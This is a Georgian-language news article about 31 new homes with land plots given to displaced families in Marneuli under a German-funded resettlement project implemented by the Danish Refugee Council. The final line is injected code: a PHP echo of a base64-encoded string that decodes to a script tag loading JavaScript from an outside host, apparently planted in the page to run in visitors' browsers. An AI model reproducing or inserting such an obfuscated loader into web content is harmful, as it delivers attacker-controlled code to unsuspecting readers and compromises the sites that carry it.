celsiusi
ავერსი საქკაბელი
მარნეულში, დევნილი ოჯახებისთვის სოფლის ტიპის დასახლება აშენდა, სადაც დევნილებს სახლებთან ერთად მიწის ნაკვეთებიც გადაეცა.
 
ოფიციალური ინფორმაციით, თანამედროვე სტანდარტების შესაბამისი 31 სახლი იმ ოჯახებს გადაეცათ, რომლებიც წლების განმავლობაში ნგრევად შენობაში ცხოვრობდნენ.
 
ახალი სოფელი საქართველოს ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრმა ეკატერინე ტიკარაძემ, გერმანიის საგანგებო და სრულუფლებიანმა ელჩმა ჰუბერტ ქნირშმა, დევნილთა სააგენტოს დირექტორმა ბესარიონ სიმონიშვილმა და ქვემო ქართლში სახელმწიფო რწმუნებულმა შოთა რეხვიაშვილმა გახსნეს.
 
“ინოვაციური პროექტის განხორციელება გერმანიისა და საქართველოს მთავრობების წარმატებული თანამშრომლობის შედეგად გამოყოფილი 10 მილიონი ევროს ოდენობის გრანტის ფარგლებში გახდა შესაძლებელი”, – ვკითხულობთ ჯანდაცვის სამინისტროს მიერ გავრცელებულ განცხადებაში.
 
ამასთან, უწყების ცნობით, პროექტი, დამატებით, დევნილი ოჯახების მიწის ნაკვეთებზე 200-ზე მეტი სახლის აშენებას, დევნილთა დასახლებებში 24 მცირე მასშტაბის ინფრასტრუქტურული პროექტის განხორციელებას, 8 ახალი საბავშვო ბაღის აშენებასა და 2 სკოლამდელი აღზრდის დაწესებულების რეაბილიტაციას ითვალისწინებს.
 
როგორც ჯანდაცვის სამინისტრო აცხადებს, გერმანიის რეკონსტრუქციისა და განვითარების ბანკის დაფინანსებულ პროექტს, რომელიც დევნილთა განსახლებასთან ერთად, მათ ეკონომიკურ, სოციალურ და საგანმანათლებლო ინტეგრაციასაც ითვალისწინებს, ლტოლვილთა დანიის საბჭო ახორციელებს.
 
1138
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");